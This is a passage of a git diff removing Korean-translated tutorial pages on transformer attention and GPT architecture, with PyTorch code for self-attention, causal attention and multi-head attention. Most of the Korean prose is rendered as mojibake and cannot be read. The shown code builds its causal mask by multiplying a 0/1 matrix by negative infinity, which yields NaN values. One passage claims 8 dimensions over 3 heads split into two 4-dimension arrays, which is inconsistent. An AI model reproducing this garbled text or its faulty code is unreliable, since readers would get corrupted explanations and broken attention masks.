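W_{query},\; W_{key},\; W_{value} \in \mathbb{R}^{\,d_{in} \times d_{out}}
```

(these correspond to `W_query`, `W_key` and `W_value` in the code below).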
- -The query is the data to use like before, while the keys and values matrices are just random-trainable matrices. - -#### Step 1: Compute Queries, Keys, and Values - -Each token will have its own query, key and value matrix by multiplying its dimension values by the defined matrices: - -
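```math
\text{queries} = X\,W_{query}, \qquad \text{keys} = X\,W_{key}, \qquad \text{values} = X\,W_{value}
```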
- -These matrices transform the original embeddings into a new space suitable for computing attention. - -**Example** - -Assuming: - -- Input dimension `din=3` (embedding size) -- Output dimension `dout=2` (desired dimension for queries, keys, and values) - -Initialize the weight matrices: -```python -import torch.nn as nn - -d_in = 3 -d_out = 2 - -W_query = nn.Parameter(torch.rand(d_in, d_out)) -W_key = nn.Parameter(torch.rand(d_in, d_out)) -W_value = nn.Parameter(torch.rand(d_in, d_out)) -``` -์ฟผ๋ฆฌ, ํ‚ค, ๊ฐ’ ๊ณ„์‚ฐ: -```python -queries = torch.matmul(inputs, W_query) -keys = torch.matmul(inputs, W_key) -values = torch.matmul(inputs, W_value) -``` -#### Step 2: Compute Scaled Dot-Product Attention - -**Compute Attention Scores** - -์ด์ „ ์˜ˆ์ œ์™€ ์œ ์‚ฌํ•˜์ง€๋งŒ, ์ด๋ฒˆ์—๋Š” ํ† ํฐ์˜ ์ฐจ์› ๊ฐ’์„ ์‚ฌ์šฉํ•˜๋Š” ๋Œ€์‹ , ์ด๋ฏธ ์ฐจ์›์„ ์‚ฌ์šฉํ•˜์—ฌ ๊ณ„์‚ฐ๋œ ํ† ํฐ์˜ ํ‚ค ํ–‰๋ ฌ์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. ๋”ฐ๋ผ์„œ ๊ฐ ์ฟผ๋ฆฌ `qi`โ€‹์™€ ํ‚ค `kjโ€‹`์— ๋Œ€ํ•ด: - -
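```math
\text{score}_{ij} = q_i \cdot k_j
```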
- -**Scale the Scores** - -๋‚ด์ ์ด ๋„ˆ๋ฌด ์ปค์ง€๋Š” ๊ฒƒ์„ ๋ฐฉ์ง€ํ•˜๊ธฐ ์œ„ํ•ด, ํ‚ค ์ฐจ์› `dk`โ€‹์˜ ์ œ๊ณฑ๊ทผ์œผ๋กœ ์ ์ˆ˜๋ฅผ ์Šค์ผ€์ผํ•ฉ๋‹ˆ๋‹ค: - -
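```math
\frac{\text{score}_{ij}}{\sqrt{d_k}}
```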
- -> [!TIP] -> ์ ์ˆ˜๋Š” ์ฐจ์›์˜ ์ œ๊ณฑ๊ทผ์œผ๋กœ ๋‚˜๋ˆ„์–ด์ง€๋Š”๋ฐ, ์ด๋Š” ๋‚ด์ ์ด ๋งค์šฐ ์ปค์งˆ ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ์ด๋ฅผ ์กฐ์ ˆํ•˜๋Š” ๋ฐ ๋„์›€์ด ๋ฉ๋‹ˆ๋‹ค. - -**Apply Softmax to Obtain Attention Weights:** ์ดˆ๊ธฐ ์˜ˆ์ œ์™€ ๊ฐ™์ด, ๋ชจ๋“  ๊ฐ’์„ ์ •๊ทœํ™”ํ•˜์—ฌ ํ•ฉ์ด 1์ด ๋˜๋„๋ก ํ•ฉ๋‹ˆ๋‹ค. - -
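```math
\text{attention weights} = \mathrm{softmax}\!\left(\frac{Q K^{\top}}{\sqrt{d_k}}\right)
```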
- -#### Step 3: Compute Context Vectors - -์ดˆ๊ธฐ ์˜ˆ์ œ์™€ ๊ฐ™์ด, ๊ฐ ๊ฐ’์„ ํ•ด๋‹น ์ฃผ์˜ ๊ฐ€์ค‘์น˜๋กœ ๊ณฑํ•˜์—ฌ ๋ชจ๋“  ๊ฐ’ ํ–‰๋ ฌ์„ ํ•ฉ์‚ฐํ•ฉ๋‹ˆ๋‹ค: - -
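```math
\text{context} = \mathrm{softmax}\!\left(\frac{Q K^{\top}}{\sqrt{d_k}}\right) V
```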
- -### Code Example - -[https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb)์—์„œ ์˜ˆ์ œ๋ฅผ ๊ฐ€์ ธ์™€์„œ ์šฐ๋ฆฌ๊ฐ€ ์ด์•ผ๊ธฐํ•œ ์ž๊ธฐ ์ฃผ์˜ ๊ธฐ๋Šฅ์„ ๊ตฌํ˜„ํ•˜๋Š” ์ด ํด๋ž˜์Šค๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: -```python -import torch - -inputs = torch.tensor( -[[0.43, 0.15, 0.89], # Your (x^1) -[0.55, 0.87, 0.66], # journey (x^2) -[0.57, 0.85, 0.64], # starts (x^3) -[0.22, 0.58, 0.33], # with (x^4) -[0.77, 0.25, 0.10], # one (x^5) -[0.05, 0.80, 0.55]] # step (x^6) -) - -import torch.nn as nn -class SelfAttention_v2(nn.Module): - -def __init__(self, d_in, d_out, qkv_bias=False): -super().__init__() -self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias) -self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias) -self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias) - -def forward(self, x): -keys = self.W_key(x) -queries = self.W_query(x) -values = self.W_value(x) - -attn_scores = queries @ keys.T -attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1) - -context_vec = attn_weights @ values -return context_vec - -d_in=3 -d_out=2 -torch.manual_seed(789) -sa_v2 = SelfAttention_v2(d_in, d_out) -print(sa_v2(inputs)) -``` -> [!NOTE] -> ๋งคํŠธ๋ฆญ์Šค๋ฅผ ์ž„์˜์˜ ๊ฐ’์œผ๋กœ ์ดˆ๊ธฐํ™”ํ•˜๋Š” ๋Œ€์‹ , `nn.Linear`๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋ชจ๋“  ๊ฐ€์ค‘์น˜๋ฅผ ํ•™์Šตํ•  ๋งค๊ฐœ๋ณ€์ˆ˜๋กœ ํ‘œ์‹œํ•ฉ๋‹ˆ๋‹ค. - -## ์ธ๊ณผ์  ์ฃผ์˜: ๋ฏธ๋ž˜ ๋‹จ์–ด ์ˆจ๊ธฐ๊ธฐ - -LLM์—์„œ๋Š” ๋ชจ๋ธ์ด ํ˜„์žฌ ์œ„์น˜ ์ด์ „์— ๋‚˜ํƒ€๋‚˜๋Š” ํ† ํฐ๋งŒ ๊ณ ๋ คํ•˜์—ฌ **๋‹ค์Œ ํ† ํฐ์„ ์˜ˆ์ธก**ํ•˜๋„๋ก ํ•˜๊ธฐ๋ฅผ ์›ํ•ฉ๋‹ˆ๋‹ค. **์ธ๊ณผ์  ์ฃผ์˜**๋Š” **๋งˆ์Šคํ‚น๋œ ์ฃผ์˜**๋ผ๊ณ ๋„ ํ•˜๋ฉฐ, ์ฃผ์˜ ๋ฉ”์ปค๋‹ˆ์ฆ˜์„ ์ˆ˜์ •ํ•˜์—ฌ ๋ฏธ๋ž˜ ํ† ํฐ์— ๋Œ€ํ•œ ์ ‘๊ทผ์„ ๋ฐฉ์ง€ํ•จ์œผ๋กœ์จ ์ด๋ฅผ ๋‹ฌ์„ฑํ•ฉ๋‹ˆ๋‹ค. - -### ์ธ๊ณผ์  ์ฃผ์˜ ๋งˆ์Šคํฌ ์ ์šฉ - -์ธ๊ณผ์  ์ฃผ์˜๋ฅผ ๊ตฌํ˜„ํ•˜๊ธฐ ์œ„ํ•ด, ์†Œํ”„ํŠธ๋งฅ์Šค ์—ฐ์‚ฐ **์ด์ „**์— ์ฃผ์˜ ์ ์ˆ˜์— ๋งˆ์Šคํฌ๋ฅผ ์ ์šฉํ•˜์—ฌ ๋‚˜๋จธ์ง€ ์ ์ˆ˜๊ฐ€ ์—ฌ์ „ํžˆ 1์ด ๋˜๋„๋ก ํ•ฉ๋‹ˆ๋‹ค. ์ด ๋งˆ์Šคํฌ๋Š” ๋ฏธ๋ž˜ ํ† ํฐ์˜ ์ฃผ์˜ ์ ์ˆ˜๋ฅผ ์Œ์˜ ๋ฌดํ•œ๋Œ€๋กœ ์„ค์ •ํ•˜์—ฌ ์†Œํ”„ํŠธ๋งฅ์Šค ์ดํ›„์— ๊ทธ๋“ค์˜ ์ฃผ์˜ ๊ฐ€์ค‘์น˜๊ฐ€ 0์ด ๋˜๋„๋ก ๋ณด์žฅํ•ฉ๋‹ˆ๋‹ค. - -**๋‹จ๊ณ„** - -1. **์ฃผ์˜ ์ ์ˆ˜ ๊ณ„์‚ฐ**: ์ด์ „๊ณผ ๋™์ผํ•ฉ๋‹ˆ๋‹ค. -2. **๋งˆ์Šคํฌ ์ ์šฉ**: ๋Œ€๊ฐ์„  ์œ„์— ์Œ์˜ ๋ฌดํ•œ๋Œ€๋กœ ์ฑ„์›Œ์ง„ ์ƒ์‚ผ๊ฐ ํ–‰๋ ฌ์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. - -```python -mask = torch.triu(torch.ones(seq_len, seq_len), diagonal=1) * float('-inf') -masked_scores = attention_scores + mask -``` - -3. **์†Œํ”„ํŠธ๋งฅ์Šค ์ ์šฉ**: ๋งˆ์Šคํ‚น๋œ ์ ์ˆ˜๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์ฃผ์˜ ๊ฐ€์ค‘์น˜๋ฅผ ๊ณ„์‚ฐํ•ฉ๋‹ˆ๋‹ค. - -```python -attention_weights = torch.softmax(masked_scores, dim=-1) -``` - -### ๋“œ๋กญ์•„์›ƒ์œผ๋กœ ์ถ”๊ฐ€ ์ฃผ์˜ ๊ฐ€์ค‘์น˜ ๋งˆ์Šคํ‚น - -**๊ณผ์ ํ•ฉ์„ ๋ฐฉ์ง€ํ•˜๊ธฐ ์œ„ํ•ด**, ์†Œํ”„ํŠธ๋งฅ์Šค ์—ฐ์‚ฐ ํ›„ ์ฃผ์˜ ๊ฐ€์ค‘์น˜์— **๋“œ๋กญ์•„์›ƒ**์„ ์ ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋“œ๋กญ์•„์›ƒ์€ ํ•™์Šต ์ค‘์— **์ผ๋ถ€ ์ฃผ์˜ ๊ฐ€์ค‘์น˜๋ฅผ ๋ฌด์ž‘์œ„๋กœ 0์œผ๋กœ ๋งŒ๋“ญ๋‹ˆ๋‹ค**. -```python -dropout = nn.Dropout(p=0.5) -attention_weights = dropout(attention_weights) -``` -์ •๊ธฐ์ ์ธ ๋“œ๋กญ์•„์›ƒ์€ ์•ฝ 10-20%์ž…๋‹ˆ๋‹ค. 
- -### ์ฝ”๋“œ ์˜ˆ์ œ - -์ฝ”๋“œ ์˜ˆ์ œ๋Š” [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb)์—์„œ ๊ฐ€์ ธ์™”์Šต๋‹ˆ๋‹ค: -```python -import torch -import torch.nn as nn - -inputs = torch.tensor( -[[0.43, 0.15, 0.89], # Your (x^1) -[0.55, 0.87, 0.66], # journey (x^2) -[0.57, 0.85, 0.64], # starts (x^3) -[0.22, 0.58, 0.33], # with (x^4) -[0.77, 0.25, 0.10], # one (x^5) -[0.05, 0.80, 0.55]] # step (x^6) -) - -batch = torch.stack((inputs, inputs), dim=0) -print(batch.shape) - -class CausalAttention(nn.Module): - -def __init__(self, d_in, d_out, context_length, -dropout, qkv_bias=False): -super().__init__() -self.d_out = d_out -self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias) -self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias) -self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias) -self.dropout = nn.Dropout(dropout) -self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1)) # New - -def forward(self, x): -b, num_tokens, d_in = x.shape -# b is the num of batches -# num_tokens is the number of tokens per batch -# d_in is the dimensions er token - -keys = self.W_key(x) # This generates the keys of the tokens -queries = self.W_query(x) -values = self.W_value(x) - -attn_scores = queries @ keys.transpose(1, 2) # Moves the third dimension to the second one and the second one to the third one to be able to multiply -attn_scores.masked_fill_( # New, _ ops are in-place -self.mask.bool()[:num_tokens, :num_tokens], -torch.inf) # `:num_tokens` to account for cases where the number of tokens in the batch is smaller than the supported context_size -attn_weights = torch.softmax( -attn_scores / keys.shape[-1]**0.5, dim=-1 -) -attn_weights = self.dropout(attn_weights) - -context_vec = attn_weights @ values -return context_vec - -torch.manual_seed(123) - -context_length = batch.shape[1] -d_in = 3 -d_out = 2 -ca = CausalAttention(d_in, d_out, context_length, 0.0) - -context_vecs = ca(batch) - -print(context_vecs) -print("context_vecs.shape:", context_vecs.shape) -``` -## Single-Head Attention์„ Multi-Head Attention์œผ๋กœ ํ™•์žฅํ•˜๊ธฐ - -**Multi-head attention**์€ ์‹ค์งˆ์ ์œผ๋กœ **์ž๊ธฐ ์ฃผ์˜ ํ•จ์ˆ˜**์˜ **์—ฌ๋Ÿฌ ์ธ์Šคํ„ด์Šค**๋ฅผ ์‹คํ–‰ํ•˜๋Š” ๊ฒƒ์œผ๋กœ, ๊ฐ ์ธ์Šคํ„ด์Šค๋Š” **์ž์‹ ์˜ ๊ฐ€์ค‘์น˜**๋ฅผ ๊ฐ€์ง€๊ณ  ์žˆ์–ด ์„œ๋กœ ๋‹ค๋ฅธ ์ตœ์ข… ๋ฒกํ„ฐ๊ฐ€ ๊ณ„์‚ฐ๋ฉ๋‹ˆ๋‹ค. - -### ์ฝ”๋“œ ์˜ˆ์ œ - -์ด์ „ ์ฝ”๋“œ๋ฅผ ์žฌ์‚ฌ์šฉํ•˜๊ณ  ์—ฌ๋Ÿฌ ๋ฒˆ ์‹คํ–‰ํ•˜๋Š” ๋ž˜ํผ๋ฅผ ์ถ”๊ฐ€ํ•˜๋Š” ๊ฒƒ์ด ๊ฐ€๋Šฅํ•  ์ˆ˜ ์žˆ์ง€๋งŒ, ์ด๋Š” ๋ชจ๋“  ํ—ค๋“œ๋ฅผ ๋™์‹œ์— ์ฒ˜๋ฆฌํ•˜๋Š” [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb)์—์„œ ๋” ์ตœ์ ํ™”๋œ ๋ฒ„์ „์ž…๋‹ˆ๋‹ค (๋น„์šฉ์ด ๋งŽ์ด ๋“œ๋Š” for ๋ฃจํ”„์˜ ์ˆ˜๋ฅผ ์ค„์ž„). ์ฝ”๋“œ์—์„œ ๋ณผ ์ˆ˜ ์žˆ๋“ฏ์ด, ๊ฐ ํ† ํฐ์˜ ์ฐจ์›์€ ํ—ค๋“œ ์ˆ˜์— ๋”ฐ๋ผ ์„œ๋กœ ๋‹ค๋ฅธ ์ฐจ์›์œผ๋กœ ๋‚˜๋‰ฉ๋‹ˆ๋‹ค. 
์ด๋ ‡๊ฒŒ ํ•˜๋ฉด ํ† ํฐ์ด 8์ฐจ์›์„ ๊ฐ€์ง€๊ณ  ์žˆ๊ณ  3๊ฐœ์˜ ํ—ค๋“œ๋ฅผ ์‚ฌ์šฉํ•˜๊ณ ์ž ํ•  ๊ฒฝ์šฐ, ์ฐจ์›์€ 4์ฐจ์› ๋ฐฐ์—ด 2๊ฐœ๋กœ ๋‚˜๋‰˜๊ณ  ๊ฐ ํ—ค๋“œ๋Š” ๊ทธ ์ค‘ ํ•˜๋‚˜๋ฅผ ์‚ฌ์šฉํ•˜๊ฒŒ ๋ฉ๋‹ˆ๋‹ค: -```python -class MultiHeadAttention(nn.Module): -def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False): -super().__init__() -assert (d_out % num_heads == 0), \ -"d_out must be divisible by num_heads" - -self.d_out = d_out -self.num_heads = num_heads -self.head_dim = d_out // num_heads # Reduce the projection dim to match desired output dim - -self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias) -self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias) -self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias) -self.out_proj = nn.Linear(d_out, d_out) # Linear layer to combine head outputs -self.dropout = nn.Dropout(dropout) -self.register_buffer( -"mask", -torch.triu(torch.ones(context_length, context_length), -diagonal=1) -) - -def forward(self, x): -b, num_tokens, d_in = x.shape -# b is the num of batches -# num_tokens is the number of tokens per batch -# d_in is the dimensions er token - -keys = self.W_key(x) # Shape: (b, num_tokens, d_out) -queries = self.W_query(x) -values = self.W_value(x) - -# We implicitly split the matrix by adding a `num_heads` dimension -# Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim) -keys = keys.view(b, num_tokens, self.num_heads, self.head_dim) -values = values.view(b, num_tokens, self.num_heads, self.head_dim) -queries = queries.view(b, num_tokens, self.num_heads, self.head_dim) - -# Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim) -keys = keys.transpose(1, 2) -queries = queries.transpose(1, 2) -values = values.transpose(1, 2) - -# Compute scaled dot-product attention (aka self-attention) with a causal mask -attn_scores = queries @ keys.transpose(2, 3) # Dot product for each head - -# Original mask truncated to the number of tokens and converted to boolean -mask_bool = self.mask.bool()[:num_tokens, :num_tokens] - -# Use the mask to fill attention scores -attn_scores.masked_fill_(mask_bool, -torch.inf) - -attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1) -attn_weights = self.dropout(attn_weights) - -# Shape: (b, num_tokens, num_heads, head_dim) -context_vec = (attn_weights @ values).transpose(1, 2) - -# Combine heads, where self.d_out = self.num_heads * self.head_dim -context_vec = context_vec.contiguous().view(b, num_tokens, self.d_out) -context_vec = self.out_proj(context_vec) # optional projection - -return context_vec - -torch.manual_seed(123) - -batch_size, context_length, d_in = batch.shape -d_out = 2 -mha = MultiHeadAttention(d_in, d_out, context_length, 0.0, num_heads=2) - -context_vecs = mha(batch) - -print(context_vecs) -print("context_vecs.shape:", context_vecs.shape) - -``` -๋‹ค๋ฅธ ๊ฐ„๊ฒฐํ•˜๊ณ  ํšจ์œจ์ ์ธ ๊ตฌํ˜„์„ ์œ„ํ•ด PyTorch์˜ [`torch.nn.MultiheadAttention`](https://pytorch.org/docs/stable/generated/torch.nn.MultiheadAttention.html) ํด๋ž˜์Šค๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. - -> [!TIP] -> ChatGPT์˜ ์งง์€ ๋‹ต๋ณ€: ์™œ ๊ฐ ํ—ค๋“œ๊ฐ€ ๋ชจ๋“  ํ† ํฐ์˜ ๋ชจ๋“  ์ฐจ์›์„ ํ™•์ธํ•˜๋Š” ๋Œ€์‹  ํ† ํฐ์˜ ์ฐจ์›์„ ํ—ค๋“œ ๊ฐ„์— ๋‚˜๋ˆ„๋Š” ๊ฒƒ์ด ๋” ๋‚˜์€์ง€์— ๋Œ€ํ•œ ์„ค๋ช…: -> -> ๊ฐ ํ—ค๋“œ๊ฐ€ ๋ชจ๋“  ์ž„๋ฒ ๋”ฉ ์ฐจ์›์„ ์ฒ˜๋ฆฌํ•  ์ˆ˜ ์žˆ๋„๋ก ํ•˜๋Š” ๊ฒƒ์ด ์ „์ฒด ์ •๋ณด๋ฅผ ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ์œ ๋ฆฌํ•ด ๋ณด์ผ ์ˆ˜ ์žˆ์ง€๋งŒ, ํ‘œ์ค€ ๊ด€ํ–‰์€ **์ž„๋ฒ ๋”ฉ ์ฐจ์›์„ ํ—ค๋“œ ๊ฐ„์— ๋‚˜๋ˆ„๋Š” ๊ฒƒ**์ž…๋‹ˆ๋‹ค. 
์ด ์ ‘๊ทผ ๋ฐฉ์‹์€ ๊ณ„์‚ฐ ํšจ์œจ์„ฑ๊ณผ ๋ชจ๋ธ ์„ฑ๋Šฅ์˜ ๊ท ํ˜•์„ ๋งž์ถ”๊ณ  ๊ฐ ํ—ค๋“œ๊ฐ€ ๋‹ค์–‘ํ•œ ํ‘œํ˜„์„ ํ•™์Šตํ•˜๋„๋ก ์žฅ๋ คํ•ฉ๋‹ˆ๋‹ค. ๋”ฐ๋ผ์„œ ์ž„๋ฒ ๋”ฉ ์ฐจ์›์„ ๋‚˜๋ˆ„๋Š” ๊ฒƒ์ด ์ผ๋ฐ˜์ ์œผ๋กœ ๊ฐ ํ—ค๋“œ๊ฐ€ ๋ชจ๋“  ์ฐจ์›์„ ํ™•์ธํ•˜๋Š” ๊ฒƒ๋ณด๋‹ค ์„ ํ˜ธ๋ฉ๋‹ˆ๋‹ค. - -## References - -- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) diff --git a/src/todo/llm-training-data-preparation/5.-llm-architecture.md b/src/todo/llm-training-data-preparation/5.-llm-architecture.md deleted file mode 100644 index ba4547a23..000000000 --- a/src/todo/llm-training-data-preparation/5.-llm-architecture.md +++ /dev/null @@ -1,666 +0,0 @@ -# 5. LLM Architecture - -## LLM Architecture - -> [!TIP] -> ์ด ๋‹ค์„ฏ ๋ฒˆ์งธ ๋‹จ๊ณ„์˜ ๋ชฉํ‘œ๋Š” ๋งค์šฐ ๊ฐ„๋‹จํ•ฉ๋‹ˆ๋‹ค: **์ „์ฒด LLM์˜ ์•„ํ‚คํ…์ฒ˜๋ฅผ ๊ฐœ๋ฐœํ•˜๋Š” ๊ฒƒ**์ž…๋‹ˆ๋‹ค. ๋ชจ๋“  ๊ฒƒ์„ ๊ฒฐํ•ฉํ•˜๊ณ , ๋ชจ๋“  ๋ ˆ์ด์–ด๋ฅผ ์ ์šฉํ•˜๋ฉฐ, ํ…์ŠคํŠธ๋ฅผ ์ƒ์„ฑํ•˜๊ฑฐ๋‚˜ ํ…์ŠคํŠธ๋ฅผ ID๋กœ ๋ณ€ํ™˜ํ•˜๊ณ  ๋‹ค์‹œ ๋ณ€ํ™˜ํ•˜๋Š” ๋ชจ๋“  ๊ธฐ๋Šฅ์„ ๋งŒ๋“ญ๋‹ˆ๋‹ค. -> -> ์ด ์•„ํ‚คํ…์ฒ˜๋Š” ํ›ˆ๋ จ ํ›„ ํ…์ŠคํŠธ๋ฅผ ํ›ˆ๋ จํ•˜๊ณ  ์˜ˆ์ธกํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. - -LLM ์•„ํ‚คํ…์ฒ˜ ์˜ˆ์‹œ๋Š” [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb)์—์„œ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: - -๋†’์€ ์ˆ˜์ค€์˜ ํ‘œํ˜„์€ ๋‹ค์Œ์—์„œ ๊ด€์ฐฐํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: - -

![High-level GPT architecture diagram](https://camo.githubusercontent.com/6c8c392f72d5b9e86c94aeb9470beab435b888d24135926f1746eb88e0cc18fb/68747470733a2f2f73656261737469616e72617363686b612e636f6d2f696d616765732f4c4c4d732d66726f6d2d736372617463682d696d616765732f636830345f636f6d707265737365642f31332e776562703f31)

- -1. **Input (Tokenized Text)**: ํ”„๋กœ์„ธ์Šค๋Š” ํ† ํฐํ™”๋œ ํ…์ŠคํŠธ๋กœ ์‹œ์ž‘๋˜๋ฉฐ, ์ด๋Š” ์ˆซ์ž ํ‘œํ˜„์œผ๋กœ ๋ณ€ํ™˜๋ฉ๋‹ˆ๋‹ค. -2. **Token Embedding and Positional Embedding Layer**: ํ† ํฐํ™”๋œ ํ…์ŠคํŠธ๋Š” **ํ† ํฐ ์ž„๋ฒ ๋”ฉ** ๋ ˆ์ด์–ด์™€ **์œ„์น˜ ์ž„๋ฒ ๋”ฉ ๋ ˆ์ด์–ด**๋ฅผ ํ†ต๊ณผํ•˜์—ฌ, ์‹œํ€€์Šค์—์„œ ํ† ํฐ์˜ ์œ„์น˜๋ฅผ ์บก์ฒ˜ํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” ๋‹จ์–ด ์ˆœ์„œ๋ฅผ ์ดํ•ดํ•˜๋Š” ๋ฐ ์ค‘์š”ํ•ฉ๋‹ˆ๋‹ค. -3. **Transformer Blocks**: ๋ชจ๋ธ์€ **12๊ฐœ์˜ ํŠธ๋žœ์Šคํฌ๋จธ ๋ธ”๋ก**์„ ํฌํ•จํ•˜๋ฉฐ, ๊ฐ ๋ธ”๋ก์€ ์—ฌ๋Ÿฌ ๋ ˆ์ด์–ด๋กœ ๊ตฌ์„ฑ๋ฉ๋‹ˆ๋‹ค. ์ด ๋ธ”๋ก์€ ๋‹ค์Œ ์‹œํ€€์Šค๋ฅผ ๋ฐ˜๋ณตํ•ฉ๋‹ˆ๋‹ค: -- **Masked Multi-Head Attention**: ๋ชจ๋ธ์ด ์ž…๋ ฅ ํ…์ŠคํŠธ์˜ ๋‹ค์–‘ํ•œ ๋ถ€๋ถ„์— ๋™์‹œ์— ์ง‘์ค‘ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. -- **Layer Normalization**: ํ›ˆ๋ จ์„ ์•ˆ์ •ํ™”ํ•˜๊ณ  ๊ฐœ์„ ํ•˜๊ธฐ ์œ„ํ•œ ์ •๊ทœํ™” ๋‹จ๊ณ„์ž…๋‹ˆ๋‹ค. -- **Feed Forward Layer**: ์ฃผ์˜ ๋ ˆ์ด์–ด์—์„œ ์ •๋ณด๋ฅผ ์ฒ˜๋ฆฌํ•˜๊ณ  ๋‹ค์Œ ํ† ํฐ์— ๋Œ€ํ•œ ์˜ˆ์ธก์„ ์ˆ˜ํ–‰ํ•˜๋Š” ์—ญํ• ์„ ํ•ฉ๋‹ˆ๋‹ค. -- **Dropout Layers**: ์ด ๋ ˆ์ด์–ด๋Š” ํ›ˆ๋ จ ์ค‘ ๋ฌด์ž‘์œ„๋กœ ์œ ๋‹›์„ ๋“œ๋กญํ•˜์—ฌ ๊ณผ์ ํ•ฉ์„ ๋ฐฉ์ง€ํ•ฉ๋‹ˆ๋‹ค. -4. **Final Output Layer**: ๋ชจ๋ธ์€ **4x50,257 ์ฐจ์›์˜ ํ…์„œ**๋ฅผ ์ถœ๋ ฅํ•˜๋ฉฐ, ์—ฌ๊ธฐ์„œ **50,257**์€ ์–ดํœ˜์˜ ํฌ๊ธฐ๋ฅผ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค. ์ด ํ…์„œ์˜ ๊ฐ ํ–‰์€ ๋ชจ๋ธ์ด ์‹œํ€€์Šค์—์„œ ๋‹ค์Œ ๋‹จ์–ด๋ฅผ ์˜ˆ์ธกํ•˜๋Š” ๋ฐ ์‚ฌ์šฉํ•˜๋Š” ๋ฒกํ„ฐ์— ํ•ด๋‹นํ•ฉ๋‹ˆ๋‹ค. -5. **Goal**: ๋ชฉํ‘œ๋Š” ์ด๋Ÿฌํ•œ ์ž„๋ฒ ๋”ฉ์„ ๊ฐ€์ ธ์™€ ๋‹ค์‹œ ํ…์ŠคํŠธ๋กœ ๋ณ€ํ™˜ํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ๊ตฌ์ฒด์ ์œผ๋กœ, ์ถœ๋ ฅ์˜ ๋งˆ์ง€๋ง‰ ํ–‰์€ ์ด ๋‹ค์ด์–ด๊ทธ๋žจ์—์„œ "forward"๋กœ ํ‘œ์‹œ๋œ ๋‹ค์Œ ๋‹จ์–ด๋ฅผ ์ƒ์„ฑํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. - -### Code representation -```python -import torch -import torch.nn as nn -import tiktoken - -class GELU(nn.Module): -def __init__(self): -super().__init__() - -def forward(self, x): -return 0.5 * x * (1 + torch.tanh( -torch.sqrt(torch.tensor(2.0 / torch.pi)) * -(x + 0.044715 * torch.pow(x, 3)) -)) - -class FeedForward(nn.Module): -def __init__(self, cfg): -super().__init__() -self.layers = nn.Sequential( -nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]), -GELU(), -nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]), -) - -def forward(self, x): -return self.layers(x) - -class MultiHeadAttention(nn.Module): -def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False): -super().__init__() -assert d_out % num_heads == 0, "d_out must be divisible by num_heads" - -self.d_out = d_out -self.num_heads = num_heads -self.head_dim = d_out // num_heads # Reduce the projection dim to match desired output dim - -self.W_query = nn.Linear(d_in, d_out, bias=qkv_bias) -self.W_key = nn.Linear(d_in, d_out, bias=qkv_bias) -self.W_value = nn.Linear(d_in, d_out, bias=qkv_bias) -self.out_proj = nn.Linear(d_out, d_out) # Linear layer to combine head outputs -self.dropout = nn.Dropout(dropout) -self.register_buffer('mask', torch.triu(torch.ones(context_length, context_length), diagonal=1)) - -def forward(self, x): -b, num_tokens, d_in = x.shape - -keys = self.W_key(x) # Shape: (b, num_tokens, d_out) -queries = self.W_query(x) -values = self.W_value(x) - -# We implicitly split the matrix by adding a `num_heads` dimension -# Unroll last dim: (b, num_tokens, d_out) -> (b, num_tokens, num_heads, head_dim) -keys = keys.view(b, num_tokens, self.num_heads, self.head_dim) -values = values.view(b, num_tokens, self.num_heads, self.head_dim) -queries = queries.view(b, num_tokens, self.num_heads, self.head_dim) - -# Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim) -keys = keys.transpose(1, 2) 
